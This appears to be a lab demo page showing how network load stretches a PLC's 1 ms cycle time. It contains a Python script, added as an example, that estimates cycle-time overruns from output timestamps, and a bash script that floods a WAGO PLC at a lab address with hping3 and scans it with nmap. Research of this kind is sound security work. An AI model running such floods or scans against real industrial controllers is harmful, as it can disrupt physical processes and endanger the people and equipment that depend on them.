PLC Cycle Time Attack

Demo of how communication load can influence the cycle time of a PLC.

  • Default main cyclic task is used.
  • Cycle time is set to 1ms.
  • Every 250 cycles the next output is set.
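
With these settings an output step should occur every 250 ms, so a longer gap between steps means the cycle time was stretched. The following is an added example, not code from the original post, that estimates effective cycle time from output-step timestamps; the timestamps are constructed sample data (assumed to come from an external capture such as a logic analyzer), and the function names and 10% tolerance are assumptions.

```python
"""Estimate PLC cycle-time stretch from the timestamps of output steps."""

CONFIGURED_CYCLE_MS = 1.0  # from the page: cycle time is set to 1 ms
CYCLES_PER_STEP = 250      # from the page: next output is set every 250 cycles

# Constructed sample: seconds at which each output step was observed.
# Idle at first, two slow intervals under communication load, then recovery.
SAMPLE_STEPS_S = [0.000, 0.250, 0.500, 0.750, 1.125, 1.625, 1.875, 2.125]


def cycle_times_ms(steps_s):
    """Mean effective cycle time (ms) for each interval between steps."""
    pairs = list(zip(steps_s, steps_s[1:]))
    if any(b <= a for a, b in pairs):
        raise ValueError("timestamps must be strictly increasing")
    return [(b - a) * 1000.0 / CYCLES_PER_STEP for a, b in pairs]


def flag_overruns(steps_s, tolerance=0.10):
    """Return (interval_start_s, cycle_ms, stretch_factor) for every
    interval whose cycle time exceeds the configured value by > tolerance."""
    limit = CONFIGURED_CYCLE_MS * (1.0 + tolerance)
    flagged = []
    for start, ct in zip(steps_s, cycle_times_ms(steps_s)):
        if ct > limit:
            flagged.append((start, round(ct, 3),
                            round(ct / CONFIGURED_CYCLE_MS, 2)))
    return flagged


def accumulated_delay_ms(steps_s):
    """How far the output sequence lags behind its nominal schedule."""
    if len(steps_s) < 2:
        return 0.0
    elapsed_ms = (steps_s[-1] - steps_s[0]) * 1000.0
    nominal_ms = (len(steps_s) - 1) * CYCLES_PER_STEP * CONFIGURED_CYCLE_MS
    return elapsed_ms - nominal_ms


if __name__ == "__main__":
    for start, ct, factor in flag_overruns(SAMPLE_STEPS_S):
        print(f"t={start:.3f}s cycle={ct} ms ({factor}x configured)")
    print(f"sequence lag: {accumulated_delay_ms(SAMPLE_STEPS_S)} ms")
```
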

Attack on different PLCs

Attack Code

#!/bin/bash
# Attack Script for WAGO PLC

# Make sure only root can run our script
if [ "$(id -u)" != "0" ]; then
   echo "This script must be run as root" 1>&2
   exit 1
fi

# Check if device is reachable
echo "====================================="
echo "Check if device is reachable"
fping -c1 -t1000 10.0.0.2 2>/dev/null 1>/dev/null
if [ "$?" = 0 ]
then
  echo "Host reachable"
else
  echo "Host not reachable"
  exit 1
fi

# Idle
echo "====================================="
echo "Idle for 20s"
sleep 20s
# -n1 returns after a single keypress, matching the prompt text
read -n1 -s -r -p "Press any key for flooding..."; echo

# Flooding full
echo "====================================="
echo "Hping3 flood for 20s"
echo "hping3 --flood 10.0.0.2"
timeout 20 hping3 --flood 10.0.0.2 &> /dev/null

# Idle 5s
echo "====================================="
echo "Idle for 5s"
sleep 5s
read -n1 -s -r -p "Press any key for hping3 with delay..."; echo

# Hping with delay
echo "====================================="
echo "Hping3 with delay between packets for 20s"
echo "hping3 -i u1100 10.0.0.2"
timeout 20 hping3 -i u1100 10.0.0.2 &> /dev/null

# Idle 5s
echo "====================================="
echo "Idle for 5s"
sleep 5s
read -n1 -s -r -p "Press any key for standard nmap..."; echo

# Standard nmap scan
echo "====================================="
echo "Standard nmap scan for a maximum of 20s"
echo "nmap 10.0.0.2"
timeout 20 nmap 10.0.0.2 &> /dev/null

# Idle 5s
echo "====================================="
echo "Idle for 5s"
sleep 5s
read -n1 -s -r -p "Press any key for full port scan..."; echo

# Standard nmap full port scan
echo "====================================="
echo "Standard nmap full port scan for a maximum of 20s"
echo "nmap -p- 10.0.0.2"
timeout 20 nmap -p- 10.0.0.2 &> /dev/null

# End
echo "====================================="
echo "End of script"
read -n1 -s -r -p "Press any key to exit..."; echo
